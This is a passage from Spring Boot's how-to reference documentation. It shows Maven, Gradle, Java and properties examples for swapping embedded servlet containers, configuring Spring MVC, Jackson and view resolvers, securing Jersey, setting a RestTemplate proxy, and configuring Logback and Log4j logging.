Maven:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<dependency>\n\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t<artifactId>spring-boot-starter-web<\/artifactId>\n\t\t<exclusions>\n\t\t\t<exclusion>\n\t\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t\t<artifactId>spring-boot-starter-tomcat<\/artifactId>\n\t\t\t<\/exclusion>\n\t\t<\/exclusions>\n\t<\/dependency>\n\t<dependency>\n\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t<artifactId>spring-boot-starter-jetty<\/artifactId>\n\t<\/dependency>\n----\n\nExample in Gradle:\n\n[source,groovy,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tconfigurations {\n\t\tcompile.exclude module: \"spring-boot-starter-tomcat\"\n\t}\n\n\tdependencies {\n\t\tcompile(\"org.springframework.boot:spring-boot-starter-web:{spring-boot-version}\")\n\t\tcompile(\"org.springframework.boot:spring-boot-starter-jetty:{spring-boot-version}\")\n\t\t\/\/ ...\n\t}\n----\n\n\n\n[[howto-configure-jetty]]\n=== Configure Jetty\nGenerally you can follow the advice from\n_<<howto-discover-build-in-options-for-external-properties>>_ about\n`@ConfigurationProperties` (`ServerProperties` is the main one here), but also look at\n`EmbeddedServletContainerCustomizer`. The Jetty APIs are quite rich so once you have\naccess to the `JettyEmbeddedServletContainerFactory` you can modify it in a number\nof ways. Or the nuclear option is to add your own `JettyEmbeddedServletContainerFactory`.\n\n\n\n[[howto-use-undertow-instead-of-tomcat]]\n=== Use Undertow instead of Tomcat\nUsing Undertow instead of Tomcat is very similar to <<howto-use-jetty-instead-of-tomcat,\nusing Jetty instead of Tomcat>>. You need to exclude the Tomcat dependencies and include\nthe Undertow starter instead.\n\nExample in Maven:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<dependency>\n\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t<artifactId>spring-boot-starter-web<\/artifactId>\n\t\t<exclusions>\n\t\t\t<exclusion>\n\t\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t\t<artifactId>spring-boot-starter-tomcat<\/artifactId>\n\t\t\t<\/exclusion>\n\t\t<\/exclusions>\n\t<\/dependency>\n\t<dependency>\n\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t<artifactId>spring-boot-starter-undertow<\/artifactId>\n\t<\/dependency>\n----\n\nExample in Gradle:\n\n[source,groovy,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tconfigurations {\n\t\tcompile.exclude module: \"spring-boot-starter-tomcat\"\n\t}\n\n\tdependencies {\n\t\tcompile(\"org.springframework.boot:spring-boot-starter-web:{spring-boot-version}\")\n\t\tcompile(\"org.springframework.boot:spring-boot-starter-undertow:{spring-boot-version}\")\n\t\t\/\/ ...\n\t}\n----\n\n\n\n[[howto-configure-undertow]]\n=== Configure Undertow\nGenerally you can follow the advice from\n_<<howto-discover-build-in-options-for-external-properties>>_ about\n`@ConfigurationProperties` (`ServerProperties` and `ServerProperties.Undertow` are the\nmain ones here), but also look at\n`EmbeddedServletContainerCustomizer`. Once you have access to the\n`UndertowEmbeddedServletContainerFactory` you can use an `UndertowBuilderCustomizer` to\nmodify Undertow's configuration to meet your needs. Or the nuclear option is to add your\nown `UndertowEmbeddedServletContainerFactory`.\n\n\n\n[[howto-enable-multiple-listeners-in-undertow]]\n=== Enable Multiple Listeners with Undertow\nAdd an `UndertowBuilderCustomizer` to the `UndertowEmbeddedServletContainerFactory` and\nadd a listener to the `Builder`:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Bean\n\tpublic UndertowEmbeddedServletContainerFactory embeddedServletContainerFactory() {\n\t\tUndertowEmbeddedServletContainerFactory factory = new UndertowEmbeddedServletContainerFactory();\n\t\tfactory.addBuilderCustomizers(new UndertowBuilderCustomizer() {\n\n\t\t\t@Override\n\t\t\tpublic void customize(Builder builder) {\n\t\t\t\tbuilder.addHttpListener(8080, \"0.0.0.0\");\n\t\t\t}\n\n\t\t});\n\t\treturn factory;\n\t}\n----\n\n\n\n[[howto-use-tomcat-7]]\n=== Use Tomcat 7.x or 8.0\nTomcat 7 & 8.0 work with Spring Boot, but the default is to use Tomcat 8.5. If you cannot\nuse Tomcat 8.5 (for example, because you are using Java 1.6) you will need to change your\nclasspath to reference a different version.\n\n\n\n[[howto-use-tomcat-7-maven]]\n==== Use Tomcat 7.x or 8.0 with Maven\nIf you are using the starters and parent you can change the Tomcat version property\nand additionally import `tomcat-juli`. E.g. for a simple webapp or service:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<properties>\n\t\t<tomcat.version>7.0.59<\/tomcat.version>\n\t<\/properties>\n\t<dependencies>\n\t\t...\n\t\t<dependency>\n\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t<artifactId>spring-boot-starter-web<\/artifactId>\n\t\t<\/dependency>\n\t\t<dependency>\n\t\t\t<groupId>org.apache.tomcat<\/groupId>\n\t\t\t<artifactId>tomcat-juli<\/artifactId>\n\t\t\t<version>${tomcat.version}<\/version>\n\t\t<\/dependency>\n\t\t...\n\t<\/dependencies>\n----\n\n\n\n==== Use Tomcat 7.x or 8.0 with Gradle\n[[howto-use-tomcat-7-gradle]]\nWith Gradle, you can change the Tomcat version by setting the `tomcat.version` property\nand then additionally include `tomcat-juli`:\n\n[source,groovy,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\text['tomcat.version'] = '7.0.59'\n\tdependencies {\n\t\tcompile 'org.springframework.boot:spring-boot-starter-web'\n\t\tcompile group:'org.apache.tomcat', name:'tomcat-juli', version:property('tomcat.version')\n\t}\n----\n\n\n\n[[howto-use-jetty-9.2]]\n=== Use Jetty 9.2\nJetty 9.2 works with Spring Boot, but the default is to use Jetty 9.3. If you cannot use\nJetty 9.3 (for example, because you are using Java 7) you will need to change your\nclasspath to reference Jetty 9.2.\n\n\n\n[[howto-use-jetty-9.2-maven]]\n==== Use Jetty 9.2 with Maven\n\nIf you are using the starters and parent you can just add the Jetty starter and override\nthe `jetty.version` property:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<properties>\n\t\t<jetty.version>9.2.17.v20160517<\/jetty.version>\n\t<\/properties>\n\t<dependencies>\n\t\t<dependency>\n\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t<artifactId>spring-boot-starter-web<\/artifactId>\n\t\t\t<exclusions>\n\t\t\t\t<exclusion>\n\t\t\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t\t\t<artifactId>spring-boot-starter-tomcat<\/artifactId>\n\t\t\t\t<\/exclusion>\n\t\t\t<\/exclusions>\n\t\t<\/dependency>\n\t\t<dependency>\n\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t<artifactId>spring-boot-starter-jetty<\/artifactId>\n\t\t<\/dependency>\n\t<\/dependencies>\n----\n\n\n\n[[howto-use-jetty-9.2-gradle]]\n==== Use Jetty 9.2 with Gradle\n\nYou can set the `jetty.version` property. For example, for a simple webapp or service:\n\n[source,groovy,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\text['jetty.version'] = '9.2.17.v20160517'\n\tdependencies {\n\t\tcompile ('org.springframework.boot:spring-boot-starter-web') {\n\t\t\texclude group: 'org.springframework.boot', module: 'spring-boot-starter-tomcat'\n\t\t}\n\t\tcompile ('org.springframework.boot:spring-boot-starter-jetty')\n\t}\n----\n\n\n\n[[howto-use-jetty-8]]\n=== Use Jetty 8\nJetty 8 works with Spring Boot, but the default is to use Jetty 9.3. If you cannot use\nJetty 9.3 (for example, because you are using Java 1.6) you will need to change your\nclasspath to reference Jetty 8. You will also need to exclude Jetty's WebSocket-related\ndependencies.\n\n\n\n[[howto-use-jetty-8-maven]]\n==== Use Jetty 8 with Maven\n\nIf you are using the starters and parent you can just add the Jetty starter with\nthe required WebSocket exclusion and change the version properties, e.g. for a simple\nwebapp or service:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<properties>\n\t\t<jetty.version>8.1.15.v20140411<\/jetty.version>\n\t\t<jetty-jsp.version>2.2.0.v201112011158<\/jetty-jsp.version>\n\t<\/properties>\n\t<dependencies>\n\t\t<dependency>\n\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t<artifactId>spring-boot-starter-web<\/artifactId>\n\t\t\t<exclusions>\n\t\t\t\t<exclusion>\n\t\t\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t\t\t<artifactId>spring-boot-starter-tomcat<\/artifactId>\n\t\t\t\t<\/exclusion>\n\t\t\t<\/exclusions>\n\t\t<\/dependency>\n\t\t<dependency>\n\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t<artifactId>spring-boot-starter-jetty<\/artifactId>\n\t\t\t<exclusions>\n\t\t\t\t<exclusion>\n\t\t\t\t\t<groupId>org.eclipse.jetty.websocket<\/groupId>\n\t\t\t\t\t<artifactId>*<\/artifactId>\n\t\t\t\t<\/exclusion>\n\t\t\t<\/exclusions>\n\t\t<\/dependency>\n\t<\/dependencies>\n----\n\n\n\n[[howto-use-jetty-8-gradle]]\n==== Use Jetty 8 with Gradle\n\nYou can set the `jetty.version` property and exclude the WebSocket dependency, e.g. for a\nsimple webapp or service:\n\n[source,groovy,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\text['jetty.version'] = '8.1.15.v20140411'\n\tdependencies {\n\t\tcompile ('org.springframework.boot:spring-boot-starter-web') {\n\t\t\texclude group: 'org.springframework.boot', module: 'spring-boot-starter-tomcat'\n\t\t}\n\t\tcompile ('org.springframework.boot:spring-boot-starter-jetty') {\n\t\t\texclude group: 'org.eclipse.jetty.websocket'\n\t\t}\n\t}\n----\n\n\n\n[[howto-create-websocket-endpoints-using-serverendpoint]]\n=== Create WebSocket endpoints using @ServerEndpoint\nIf you want to use `@ServerEndpoint` in a Spring Boot application that used an embedded\ncontainer, you must declare a single `ServerEndpointExporter` `@Bean`:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Bean\n\tpublic ServerEndpointExporter serverEndpointExporter() {\n\t\treturn new ServerEndpointExporter();\n\t}\n----\n\nThis bean will register any `@ServerEndpoint` annotated beans with the underlying\nWebSocket container. When deployed to a standalone servlet container this role is\nperformed by a servlet container initializer and the `ServerEndpointExporter` bean is\nnot required.\n\n\n\n[[how-to-enable-http-response-compression]]\n=== Enable HTTP response compression\nHTTP response compression is supported by Jetty, Tomcat, and Undertow. It can be enabled\nvia `application.properties`:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tserver.compression.enabled=true\n----\n\nBy default, responses must be at least 2048 bytes in length for compression to be\nperformed. This can be configured using the `server.compression.min-response-size`\nproperty.\n\nBy default, responses will only be compressed if their content type is one of the\nfollowing:\n\n - `text\/html`\n - `text\/xml`\n - `text\/plain`\n - `text\/css`\n\nThis can be configured using the `server.compression.mime-types` property.\n\n\n\n[[howto-spring-mvc]]\n== Spring MVC\n\n\n\n[[howto-write-a-json-rest-service]]\n=== Write a JSON REST service\nAny Spring `@RestController` in a Spring Boot application should render JSON response by\ndefault as long as Jackson2 is on the classpath. For example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@RestController\n\tpublic class MyController {\n\n\t\t@RequestMapping(\"\/thing\")\n\t\tpublic MyThing thing() {\n\t\t\t\treturn new MyThing();\n\t\t}\n\n\t}\n----\n\nAs long as `MyThing` can be serialized by Jackson2 (e.g. a normal POJO or Groovy object)\nthen `http:\/\/localhost:8080\/thing` will serve a JSON representation of it by default.\nSometimes in a browser you might see XML responses because browsers tend to send accept\nheaders that prefer XML.\n\n\n\n[[howto-write-an-xml-rest-service]]\n=== Write an XML REST service\nIf you have the Jackson XML extension (`jackson-dataformat-xml`) on the classpath, it will\nbe used to render XML responses and the very same example as we used for JSON would work.\nTo use it, add the following dependency to your project:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<dependency>\n\t\t<groupId>com.fasterxml.jackson.dataformat<\/groupId>\n\t\t<artifactId>jackson-dataformat-xml<\/artifactId>\n\t<\/dependency>\n----\n\nYou may also want to add a dependency on Woodstox. It's faster than the default StAX\nimplementation provided by the JDK and also adds pretty print support and improved\nnamespace handling:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<dependency>\n\t\t<groupId>org.codehaus.woodstox<\/groupId>\n\t\t<artifactId>woodstox-core-asl<\/artifactId>\n\t<\/dependency>\n----\n\nIf Jackson's XML extension is not available, JAXB (provided by default in the JDK) will\nbe used, with the additional requirement to have `MyThing` annotated as\n`@XmlRootElement`:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@XmlRootElement\n\tpublic class MyThing {\n\t\tprivate String name;\n\t\t\/\/ .. getters and setters\n\t}\n----\n\nTo get the server to render XML instead of JSON you might have to send an\n`Accept: text\/xml` header (or use a browser).\n\n\n\n[[howto-customize-the-jackson-objectmapper]]\n=== Customize the Jackson ObjectMapper\nSpring MVC (client and server side) uses `HttpMessageConverters` to negotiate content\nconversion in an HTTP exchange. If Jackson is on the classpath you already get the\ndefault converter(s) provided by `Jackson2ObjectMapperBuilder`, an instance of which\nis auto-configured for you.\n\nThe `ObjectMapper` (or `XmlMapper` for Jackson XML converter) instance created by default\nhas the following customized properties:\n\n* `MapperFeature.DEFAULT_VIEW_INCLUSION` is disabled\n* `DeserializationFeature.FAIL_ON_UNKNOWN_PROPERTIES` is disabled\n\nSpring Boot has also some features to make it easier to customize this behavior.\n\nYou can configure the `ObjectMapper` and `XmlMapper` instances using the environment.\nJackson provides an extensive suite of simple on\/off features that can be used to\nconfigure various aspects of its processing. These features are described in six enums in\nJackson which map onto properties in the environment:\n\n|===\n|Jackson enum|Environment property\n\n|`com.fasterxml.jackson.databind.DeserializationFeature`\n|`spring.jackson.deserialization.<feature_name>=true\\|false`\n\n|`com.fasterxml.jackson.core.JsonGenerator.Feature`\n|`spring.jackson.generator.<feature_name>=true\\|false`\n\n|`com.fasterxml.jackson.databind.MapperFeature`\n|`spring.jackson.mapper.<feature_name>=true\\|false`\n\n|`com.fasterxml.jackson.core.JsonParser.Feature`\n|`spring.jackson.parser.<feature_name>=true\\|false`\n\n|`com.fasterxml.jackson.databind.SerializationFeature`\n|`spring.jackson.serialization.<feature_name>=true\\|false`\n\n|`com.fasterxml.jackson.annotation.JsonInclude.Include`\n|`spring.jackson.default-property-inclusion=always\\|non_null\\|non_absent\\|non_default\\|non_empty`\n|===\n\nFor example, to enable pretty print, set `spring.jackson.serialization.indent_output=true`.\nNote that, thanks to the use of <<boot-features-external-config-relaxed-binding,\nrelaxed binding>>, the case of `indent_output` doesn't have to match the case of the\ncorresponding enum constant which is `INDENT_OUTPUT`.\n\nThis environment-based configuration is applied to the auto-configured\n`Jackson2ObjectMapperBuilder` bean, and will apply to any mappers created\nusing the builder, including the auto-configured `ObjectMapper` bean.\n\nThe context's `Jackson2ObjectMapperBuilder` can be customized by one or more\n`Jackson2ObjectMapperBuilderCustomizer` beans. Such customizer beans can be ordered and\nBoot's own customizer has an order of 0, allowing additional customization to be applied\nboth before and after Boot's customization.\n\nAny beans of type `com.fasterxml.jackson.databind.Module` will be automatically registered\nwith the auto-configured `Jackson2ObjectMapperBuilder` and applied to any `ObjectMapper`\ninstances that it creates. This provides a global mechanism for contributing custom\nmodules when you add new features to your application.\n\nIf you want to replace the default `ObjectMapper` completely, either define a `@Bean` of\nthat type and mark it as `@Primary`, or, if you prefer the builder-based\napproach, define a `Jackson2ObjectMapperBuilder` `@Bean`. Note that in either case this\nwill disable all auto-configuration of the `ObjectMapper`.\n\nIf you provide any `@Beans` of type `MappingJackson2HttpMessageConverter` then\nthey will replace the default value in the MVC configuration. Also, a convenience bean is\nprovided of type `HttpMessageConverters` (always available if you use the default MVC\nconfiguration) which has some useful methods to access the default and user-enhanced\nmessage converters.\n\nSee also the _<<howto-customize-the-responsebody-rendering>>_ section and the\n{sc-spring-boot-autoconfigure}\/web\/WebMvcAutoConfiguration.{sc-ext}[`WebMvcAutoConfiguration`]\nsource code for more details.\n\n\n\n[[howto-customize-the-responsebody-rendering]]\n=== Customize the @ResponseBody rendering\nSpring uses `HttpMessageConverters` to render `@ResponseBody` (or responses from\n`@RestController`). You can contribute additional converters by simply adding beans of\nthat type in a Spring Boot context. If a bean you add is of a type that would have been\nincluded by default anyway (like `MappingJackson2HttpMessageConverter` for JSON\nconversions) then it will replace the default value. A convenience bean is provided of\ntype `HttpMessageConverters` (always available if you use the default MVC configuration)\nwhich has some useful methods to access the default and user-enhanced message converters\n(useful, for example if you want to manually inject them into a custom `RestTemplate`).\n\nAs in normal MVC usage, any `WebMvcConfigurerAdapter` beans that you provide can also\ncontribute converters by overriding the `configureMessageConverters` method, but unlike\nwith normal MVC, you can supply only additional converters that you need (because Spring\nBoot uses the same mechanism to contribute its defaults). Finally, if you opt-out of the\nSpring Boot default MVC configuration by providing your own `@EnableWebMvc` configuration,\nthen you can take control completely and do everything manually using\n`getMessageConverters` from `WebMvcConfigurationSupport`.\n\nSee the {sc-spring-boot-autoconfigure}\/web\/WebMvcAutoConfiguration.{sc-ext}[`WebMvcAutoConfiguration`]\nsource code for more details.\n\n\n\n[[howto-multipart-file-upload-configuration]]\n=== Handling Multipart File Uploads\nSpring Boot embraces the Servlet 3 `javax.servlet.http.Part` API to support uploading\nfiles. By default Spring Boot configures Spring MVC with a maximum file of 1MB per\nfile and a maximum of 10MB of file data in a single request. You may override these\nvalues, as well as the location to which intermediate data is stored (e.g., to the `\/tmp`\ndirectory) and the threshold past which data is flushed to disk by using the properties\nexposed in the `MultipartProperties` class. If you want to specify that files be\nunlimited, for example, set the `spring.http.multipart.max-file-size` property to `-1`.\n\nThe multipart support is helpful when you want to receive multipart encoded file data as\na `@RequestParam`-annotated parameter of type `MultipartFile` in a Spring MVC controller\nhandler method.\n\nSee the {sc-spring-boot-autoconfigure}\/web\/MultipartAutoConfiguration.{sc-ext}[`MultipartAutoConfiguration`]\nsource for more details.\n\n\n\n[[howto-switch-off-the-spring-mvc-dispatcherservlet]]\n=== Switch off the Spring MVC DispatcherServlet\nSpring Boot wants to serve all content from the root of your application `\/` down. If you\nwould rather map your own servlet to that URL you can do it, but of course you may lose\nsome of the other Boot MVC features. To add your own servlet and map it to the root\nresource just declare a `@Bean` of type `Servlet` and give it the special bean name\n`dispatcherServlet` (You can also create a bean of a different type with that name if\nyou want to switch it off and not replace it).\n\n\n\n[[howto-switch-off-default-mvc-configuration]]\n=== Switch off the Default MVC configuration\nThe easiest way to take complete control over MVC configuration is to provide your own\n`@Configuration` with the `@EnableWebMvc` annotation. This will leave all MVC\nconfiguration in your hands.\n\n\n\n[[howto-customize-view-resolvers]]\n=== Customize ViewResolvers\nA `ViewResolver` is a core component of Spring MVC, translating view names in\n`@Controller` to actual `View` implementations. Note that `ViewResolvers` are mainly\nused in UI applications, rather than REST-style services (a `View` is not used to render\na `@ResponseBody`). There are many implementations of `ViewResolver` to choose from, and\nSpring on its own is not opinionated about which ones you should use. Spring Boot, on the\nother hand, installs one or two for you depending on what it finds on the classpath and\nin the application context. The `DispatcherServlet` uses all the resolvers it finds in\nthe application context, trying each one in turn until it gets a result, so if you are\nadding your own you have to be aware of the order and in which position your resolver is\nadded.\n\n`WebMvcAutoConfiguration` adds the following `ViewResolvers` to your context:\n\n* An `InternalResourceViewResolver` with bean id '`defaultViewResolver`'. This one locates\n physical resources that can be rendered using the `DefaultServlet` (e.g. static\n resources and JSP pages if you are using those). It applies a prefix and a suffix to the\n view name and then looks for a physical resource with that path in the servlet context\n (defaults are both empty, but accessible for external configuration via\n `spring.mvc.view.prefix` and `spring.mvc.view.suffix`). It can be overridden by providing a\n bean of the same type.\n* A `BeanNameViewResolver` with id '`beanNameViewResolver`'. This is a useful member of the\n view resolver chain and will pick up any beans with the same name as the `View` being\n resolved. It shouldn't be necessary to override or replace it.\n* A `ContentNegotiatingViewResolver` with id '`viewResolver`' is only added if there *are*\n actually beans of type `View` present. This is a '`master`' resolver, delegating to all\n the others and attempting to find a match to the '`Accept`' HTTP header sent by the\n client. There is a useful\n https:\/\/spring.io\/blog\/2013\/06\/03\/content-negotiation-using-views[blog about `ContentNegotiatingViewResolver`]\n that you might like to study to learn more, and also look at the source code for detail.\n You can switch off the auto-configured\n `ContentNegotiatingViewResolver` by defining a bean named '`viewResolver`'.\n* If you use Thymeleaf you will also have a `ThymeleafViewResolver` with id\n '`thymeleafViewResolver`'. It looks for resources by surrounding the view name with a\n prefix and suffix (externalized to `spring.thymeleaf.prefix` and\n `spring.thymeleaf.suffix`, defaults '`classpath:\/templates\/`' and '`.html`'\n respectively). It can be overridden by providing a bean of the same name.\n* If you use FreeMarker you will also have a `FreeMarkerViewResolver` with id\n '`freeMarkerViewResolver`'. It looks for resources in a loader path (externalized to\n `spring.freemarker.templateLoaderPath`, default '`classpath:\/templates\/`') by\n surrounding the view name with a prefix and suffix (externalized to `spring.freemarker.prefix`\n and `spring.freemarker.suffix`, with empty and '`.ftl`' defaults respectively). It can\n be overridden by providing a bean of the same name.\n* If you use Groovy templates (actually if groovy-templates is on your classpath) you will\n also have a `GroovyMarkupViewResolver` with id '`groovyMarkupViewResolver`'. It\n looks for resources in a loader path by surrounding the view name with a prefix and\n suffix (externalized to `spring.groovy.template.prefix` and\n `spring.groovy.template.suffix`, defaults '`classpath:\/templates\/`' and '`.tpl`'\n respectively). It can be overridden by providing a bean of the same name.\n\nCheck out {sc-spring-boot-autoconfigure}\/web\/WebMvcAutoConfiguration.{sc-ext}[`WebMvcAutoConfiguration`],\n{sc-spring-boot-autoconfigure}\/thymeleaf\/ThymeleafAutoConfiguration.{sc-ext}[`ThymeleafAutoConfiguration`],\n{sc-spring-boot-autoconfigure}\/freemarker\/FreeMarkerAutoConfiguration.{sc-ext}[`FreeMarkerAutoConfiguration`] and\n{sc-spring-boot-autoconfigure}\/groovy\/template\/GroovyTemplateAutoConfiguration.{sc-ext}[`GroovyTemplateAutoConfiguration`]\n\n\n\n[[howto-use-thymeleaf-3]]\n=== Use Thymeleaf 3\nBy default, `spring-boot-starter-thymeleaf` uses Thymeleaf 2.1. If you are using the\n`spring-boot-starter-parent`, you can use Thymeleaf 3 by overriding the\n`thymeleaf.version` and `thymeleaf-layout-dialect.version` properties, for example:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<properties>\n\t\t<thymeleaf.version>3.0.2.RELEASE<\/thymeleaf.version>\n\t\t<thymeleaf-layout-dialect.version>2.1.1<\/thymeleaf-layout-dialect.version>\n\t<\/properties>\n----\n\nNOTE: if you are managing dependencies yourself, look at `spring-boot-dependencies` for\nthe list of artifacts that are related to those two versions.\n\nTo avoid a warning message about the HTML 5 template mode being deprecated and the HTML\ntemplate mode being used instead, you may also want to explicitly configure\n`spring.thymeleaf.mode` to be `HTML`, for example:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tspring.thymeleaf.mode: HTML\n----\n\nPlease refer to the\n{github-code}\/spring-boot-samples\/spring-boot-sample-web-thymeleaf3[Thymeleaf 3 sample] to\nsee this in action.\n\nIf you are using any of the other auto-configured Thymeleaf Extras (Spring Security,\nData Attribute, or Java 8 Time) you should also override each of their versions to one\nthat is compatible with Thymeleaf 3.0.\n\n\n\n[[howto-jersey]]\n== Jersey\n\n\n\n[[howto-jersey-spring-security]]\n=== Secure Jersey endpoints with Spring Security\nSpring Security can be used to secure a Jersey-based web application in much the same\nway as it can be used to secure a Spring MVC-based web application. However, if you want\nto use Spring Security's method-level security with Jersey, you must configure Jersey to\nuse `setStatus(int)` rather `sendError(int)`. This prevents Jersey from committing the\nresponse before Spring Security has had an opportunity to report an authentication or\nauthorization failure to the client.\n\nThe `jersey.config.server.response.setStatusOverSendError` must be set to `true` on the\napplication's `ResourceConfig` bean, as shown in the following example:\n\n[source,java,indent=0]\n----\ninclude::{code-examples}\/jersey\/JerseySetStatusOverSendErrorExample.java[tag=resource-config]\n----\n\n\n\n[[howto-http-clients]]\n== HTTP clients\n\n\n\n[[howto-http-clients-proxy-configuration]]\n=== Configure RestTemplate to use a proxy\nAs described in <<spring-boot-features.adoc#boot-features-restclient-customization>>,\na `RestTemplateCustomizer` can be used with `RestTemplateBuilder` to build a customized\n`RestTemplate`. This is the recommended approach for creating a `RestTemplate` configured\nto use a proxy.\n\nThe exact details of the proxy configuration depend on the underlying client request\nfactory that is being used. Here's an example of configuring\n`HttpComponentsClientRequestFactory` with an `HttpClient` that uses a proxy for all hosts\nexcept `192.168.0.5`.\n\n[source,java,indent=0]\n----\ninclude::{code-examples}\/web\/client\/RestTemplateProxyCustomizationExample.java[tag=customizer]\n----\n\n\n\n[[howto-logging]]\n== Logging\n\nSpring Boot has no mandatory logging dependency, except for the Commons Logging API, of\nwhich there are many implementations to choose from. To use http:\/\/logback.qos.ch[Logback]\nyou need to include it and `jcl-over-slf4j` (which implements the Commons Logging API) on\nthe classpath. The simplest way to do that is through the starters which all depend on\n`spring-boot-starter-logging`. For a web application you only need\n`spring-boot-starter-web` since it depends transitively on the logging starter. For\nexample, using Maven:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<dependency>\n\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t<artifactId>spring-boot-starter-web<\/artifactId>\n\t<\/dependency>\n----\n\nSpring Boot has a `LoggingSystem` abstraction that attempts to configure logging based on\nthe content of the classpath. If Logback is available it is the first choice.\n\nIf the only change you need to make to logging is to set the levels of various loggers\nthen you can do that in `application.properties` using the \"logging.level\" prefix, e.g.\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tlogging.level.org.springframework.web=DEBUG\n\tlogging.level.org.hibernate=ERROR\n----\n\nYou can also set the location of a file to log to (in addition to the console) using\n\"logging.file\".\n\nTo configure the more fine-grained settings of a logging system you need to use the native\nconfiguration format supported by the `LoggingSystem` in question. By default Spring Boot\npicks up the native configuration from its default location for the system (e.g.\n`classpath:logback.xml` for Logback), but you can set the location of the config file\nusing the \"logging.config\" property.\n\n\n\n[[howto-configure-logback-for-logging]]\n=== Configure Logback for logging\nIf you put a `logback.xml` in the root of your classpath it will be picked up from\nthere\n(or `logback-spring.xml` to take advantage of the templating features provided by Boot).\nSpring Boot provides a default base configuration that you can include if you just\nwant to set levels, e.g.\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\t<configuration>\n\t\t<include resource=\"org\/springframework\/boot\/logging\/logback\/base.xml\"\/>\n\t\t<logger name=\"org.springframework.web\" level=\"DEBUG\"\/>\n\t<\/configuration>\n----\n\nIf you look at that `base.xml` in the spring-boot jar, you will see that it uses\nsome useful System properties which the `LoggingSystem` takes care of creating for you.\nThese are:\n\n* `${PID}` the current process ID.\n* `${LOG_FILE}` if `logging.file` was set in Boot's external configuration.\n* `${LOG_PATH}` if `logging.path` was set (representing a directory for\n log files to live in).\n* `${LOG_EXCEPTION_CONVERSION_WORD}` if `logging.exception-conversion-word` was set in\n Boot's external configuration.\n\nSpring Boot also provides some nice ANSI colour terminal output on a console (but not in\na log file) using a custom Logback converter. See the default `base.xml` configuration\nfor details.\n\nIf Groovy is on the classpath you should be able to configure Logback with\n`logback.groovy` as well (it will be given preference if present).\n\n\n\n[[howto-configure-logback-for-logging-fileonly]]\n==== Configure logback for file only output\nIf you want to disable console logging and write output only to a file you need a custom\n`logback-spring.xml` that imports `file-appender.xml` but not `console-appender.xml`:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\t<configuration>\n\t\t<include resource=\"org\/springframework\/boot\/logging\/logback\/defaults.xml\" \/>\n\t\t<property name=\"LOG_FILE\" value=\"${LOG_FILE:-${LOG_PATH:-${LOG_TEMP:-${java.io.tmpdir:-\/tmp}}\/}spring.log}\"\/>\n\t\t<include resource=\"org\/springframework\/boot\/logging\/logback\/file-appender.xml\" \/>\n\t\t<root level=\"INFO\">\n\t\t\t<appender-ref ref=\"FILE\" \/>\n\t\t<\/root>\n\t<\/configuration>\n----\n\nYou also need to add `logging.file` to your `application.properties`:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tlogging.file=myapplication.log\n----\n\n\n\n[[howto-configure-log4j-for-logging]]\n=== Configure Log4j for logging\nSpring Boot supports http:\/\/logging.apache.org\/log4j\/2.x[Log4j 2] for logging\nconfiguration if it is on the classpath. If you are using the starters for\nassembling dependencies that means you have to exclude Logback and then include log4j 2\ninstead. If you aren't using the starters then you need to provide `jcl-over-slf4j`\n(at least) in addition to Log4j 2.\n\nThe simplest path is probably through the starters, even though it requires some\njiggling with excludes, .e.g. in 